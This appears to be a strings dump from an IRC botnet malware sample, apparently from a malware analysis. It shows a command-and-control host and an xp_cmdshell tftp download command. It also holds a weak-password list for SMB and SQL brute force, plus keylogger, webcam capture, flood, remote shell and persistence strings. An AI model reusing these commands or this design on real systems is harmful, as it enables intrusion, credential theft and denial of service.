\\%s\ipc$
%s Error: %s .
%s Error: %s .
explorer.exe
explorer.exe
%s %s
%s %s
%sdel.bat
%sdel.bat
del "%s"
del "%s"
%%comspec%% /c %s %s
%%comspec%% /c %s %s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell '%s'
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[NET]: %s service: '%s'.
[NET]: %s service: '%s'.
[NET]: Error with service: '%s'. %s
[NET]: Error with service: '%s'. %s
[NET]: %s: No service specified.
[NET]: %s: No service specified.
The following Windows services are registered:
The following Windows services are registered:
%s: %s (%s)
%s: %s (%s)
[NET]: %s share: '%s'.
[NET]: %s share: '%s'.
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: No share specified.
[NET]: %s: No share specified.
[NET]: Share list error: %s
[NET]: Share list error: %s
[NET]: %s username: '%s'.
[NET]: %s username: '%s'.
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: No username specified.
[NET]: %s: No username specified.
Account: %S
Account: %S
Full Name: %S
Full Name: %S
User Comment: %S
User Comment: %S
Comment: %S
Comment: %S
Privilege Level: %s
Privilege Level: %s
Auth Flags: %d
Auth Flags: %d
Home Directory: %S
Home Directory: %S
Parameters: %S
Parameters: %S
Password Age: %d
Password Age: %d
Bad Password Count: %d
Bad Password Count: %d
Number of Logins: %d
Number of Logins: %d
Last Logon: %d
Last Logon: %d
Last Logoff: %d
Last Logoff: %d
Logon Server: %S
Logon Server: %S
Workstations: %S
Workstations: %S
Country Code: %d
Country Code: %d
User's Language: %d
User's Language: %d
Max. Storage: %d
Max. Storage: %d
Units Per Week: %d
Units Per Week: %d
[NET]: User list error: %s
[NET]: User list error: %s
Total users found: %d.
Total users found: %d.
This network request is not supported.
This network request is not supported.
The operation is allowed only on the primary domain controller of the domain.
The operation is allowed only on the primary domain controller of the domain.
The password is shorter than required (or does not meet the password policy requirement.)
The password is shorter than required (or does not meet the password policy requirement.)
[NET]: %s
[NET]: %s
c$\windows\system32
c$\windows\system32
%s\%s\%s
%s\%s\%s
(no password)
(no password)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
%s\ipc$
%s\ipc$
[FLUSHDNS]: Error getting ARP cache: .
[FLUSHDNS]: Error getting ARP cache: .
[FLUSHDNS]: Not supported by this system.
[FLUSHDNS]: Not supported by this system.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
%s (%d)
%s (%d)
bot.neverup.asia
bot.neverup.asia
svchost.exe
svchost.exe
system.txt
system.txt
msconfig.dat
msconfig.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\RunServices
password1
password1
password
password
passwd
passwd
pass1234
pass1234
1234567
1234567
12345678
12345678
123456789
123456789
1234567890
1234567890
windows
windows
login
login
loginpass
loginpass
domainpass
domainpass
domainpassword
domainpassword
dbpass
dbpass
dbpassword
dbpassword
databasepass
databasepass
databasepassword
databasepassword
sqlpassoainstall
sqlpassoainstall
winpass
winpass
%s %d "%s"
%s %d "%s"
[IDENTD]: Server running on Port: 113.
[IDENTD]: Failed to start server, error: .
[MAIN]: Connected to %s.
PASS %s
NICK %s
USER %s 0 0 :%s
PONG %s
JOIN %s %s
USERHOST %s
MODE %s %s
[MAIN]: User %s logged out.
NOTICE %s :%s
NICK
:%s%s
[MAIN]: User: %s logged out.
[MAIN]: Joined channel: %s.
NOTICE %s :
VERSION %s
PING %s
[DCC]: Receive file: '%s' from user: %s.
[DCC]: Failed to start transfer thread, error: .
[DCC]: Receive file: '%s' failed from unauthorized user: %s.
[DCC]: Chat from user: %s.
[DCC]: Failed to start chat thread, error: .
[DCC]: Chat already active with user: %s.
[DCC]: Chat failed by unauthorized user: %s.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Your attempt has been logged.
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: Password accepted.
[MAIN]: User: %s logged in.
$rndnick
rndnick
[MAIN]: Random nick change: %s
[MAIN]: No user logged in at slot: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: %s
[SECURE]: %s system.
[SECURE]: Failed to start secure thread, error: .
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Failed to start server thread, error: .
rloginstop
[RLOGIND]
httpstop
[HTTPD]
TCP redirect
ddos.stop
udpstop
UDP flood
tftpstop
[TFTP]
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: .
[LOG]: Failed to start listing thread, error: .
[PROCS]: Failed to start listing thread, error: .
getcdkeys
[CDKEYS]: Search completed.
[MAIN]: Uptime: %s.
opencmd
ocmd
[CMD]: Remote shell already running.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell ready.
cmdstop
[CMD]
-[Login List]-
%d. %s
[MAIN]: Login list complete.
[FLUSHDNS]: Failed to load dnsapi.dll.
rloginserver
rlogin
[RLOGIND]: Server listening on IP: %s:%d, Username: %s.
[RLOGIND]: Failed to start server thread, error: .
httpserver
[HTTPD]: Failed to start server thread, error: .
tftpserver
tftp
[TFTP]: Already running.
[TFTP]: Failed to start server thread, error: .
findpass
[FINDPASS]: Searching for password.
[FINDPASS]: Failed to start search thread, error: .
nick
[MAIN]: Nick changed to: '%s'.
join
[MAIN]: Joined channel: '%s'.
PART %s
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Killed thread: %s.
[THREADS]: Failed to kill thread: %s.
c_rndnick
[MAIN]: Prefix changed to: '%c'.
[SHELL]: File opened: %s
[SHELL]: Couldn't open file: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[PROC]: Process killed: %s
[PROC]: Failed to terminate process: %s
[PROC]: Process killed ID: %s
[PROC]: Failed to terminate process ID: %s
[FILE]: Deleted '%s'.
[DCC]: Send File: %s, User: %s.
[FILE]: List: %s
[VISIT]: URL: %s.
[VISIT]: Failed to start connection thread, error: .
mirccmd
[CMD]: Error sending to remote shell.
[CMD]: Commands: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file failed: %s
[IDENT]: Server stopped. (%d thread(s) stopped.)
keylog
[KEYLOG]: Already running.
[KEYLOG]: Key logger active.
[KEYLOG]: Failed to start logging thread, error: .
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: No key logger thread found.
[NET]: Failed to load advapi32.dll or netapi32.dll.
[CAPTURE]: Screen capture saved to: %s.
[CAPTURE]: Driver #%d - %s - %s.
[CAPTURE]: Webcam capture saved to: %s.
[CAPTURE]: Error while capturing from webcam.
[CAPTURE]: Invalid parameters for webcam capture.
[CAPTURE]: Amateur video saved to: %s.
[CAPTURE]: Error while capturing amateur video from webcam.
%s %s %s :%s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s.
[MAIN]: Alias added: %s.
privmsg
[MAIN]: Privmsg: %s: %s.
ACTION %s
[MAIN]: Action: %s: %s.
MODE %s
[MAIN]: Mode change: %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
c_nick
[CLONE]: Nick (%s): %s
c_join
[MAIN]: Repeat: %s
[MAIN]: Repeat not allowed in command line: %s
%s%s.exe
[UPDATE]: Downloading update from: %s.
[UPDATE]: Failed to start download thread, error: .
[EXEC]: Couldn't execute file.
[EXEC]: Commands: %s
[FINDFILE]: Searching for file: %s in: %s.
[FINDFILE]: Failed to start search thread, error: .
[FILE]: Rename: '%s' to: '%s'.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: .
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Failed to start clone thread, error: .
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Failed to start flood thread, error: .
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: .
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Failed to start transfer thread, error: .
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: Failed to start redirection thread, error: .
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Failed to start scan thread, error: .
c_privmsg
[%s] %s
[%s] * %s %s
[SCAN]: Already %d scanning threads. Too many specified.
[SCAN]: Failed to start scan, port is invalid.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
udpflood
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Failed to start flood thread, error: .
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Failed to start flood thread, error: .
ICMP.dll not available
tcpflood
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Failed to start flood thread, error: .
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood type specified.
helo $rndnick
mail from:
rcpt to:
subject: %s
from: %s
[EMAIL]: Message sent to %s.
httpcon
[FTP]: File not found: %s.
%s\%i%i%i.dll
open %s
put %s
-s:%s
PTF.exe
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s failed.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start client thread, error: .
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: .
PRIVMSG %s :%s
[CMD]: Could not read data from proccess
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess.
cmd.exe
[CMD]: Remote Command Prompt
[CMD]: Failed to start IO thread, error: .
[RLOGIND]: Error: getpeername(): .
[RLOGIND]: User logged in: .
[RLOGIND]: Error: SessionRun(): .
[RLOGIND]: User logged out: .
[RLOGIND]: Protocol string too long.
[RLOGIND]: Login rejected, Remote user: .
[RLOGIND]: Error: WSAStartup(): .
[RLOGIND]: Failed to install control-C handler, error: .
[RLOGIND]: Ready and waiting for incoming connections.
[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.
[RLOGIND]: Failed to start client thread, error: .
[RLOGIND]: Error: server failed, returned: .
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SECURE]: Failed to open DCOM registry key.
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Share '%S' deleted.
[SECURE]: Failed to delete '%S' share.
[SECURE]: Share '%s' deleted.
[SECURE]: Failed to delete '%s' share.
[SECURE]: Netapi32.dll couldn't be loaded.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Share '%s' added.
[SECURE]: Failed to add '%s' share.
[RLOGIND]: Failed to create ReadShell session thread, error: .
[RLOGIND]: WaitForMultipleObjects error: .
[RLOGIND]: Failed to create shell stdout pipe, error: .
[RLOGIND]: Failed to create shell stdin pipe, error: .
[RLOGIND]: Failed to execute shell.
cmd /q
[RLOGIND]: Failed to execute shell, error: .
[RLOGIND]: SessionReadShellThread exited, error: .
tPTF.exe -i get
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Failed to start client thread, error: .
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Error: Failed to open socket(), returned: .
[SOCKS4]: Error: Failed to connect to target, returned: .
[SYN]: Send error: .
à %dh %dm
%s (%s)
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[TCP]: Error: socket() failed, returned: .
[TCP]: Error: setsockopt() failed, returned: .
[TCP]: Invalid target IP.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TFTP]: Error: socket() failed, returned: .
[TFTP]: Failed to open file: %s.
[TFTP]: File not found: %s (%s).
[TFTP]: File transfer started to IP: %s (%s).
[TFTP]: File transfer complete to IP: %s (%s).
%s: %s stopped. (%d thread(s) stopped.)
%s: No %s thread found.
[VISIT]: Invalid URL.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: URL visited.
[VISIT]: Failed to get requested URL from HTTP server.
[10-10-2016 05:13:03] [IDENTD]: Server running on Port: 113.
%System%\eohpsgi.exe
TransactNamedPipe
GetProcessHeap
PeekNamedPipe
CreatePipe
GetCPInfo
KERNEL32.dll
\C$\123456111111111111111.doc
127.0.0.1\IPC$\
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\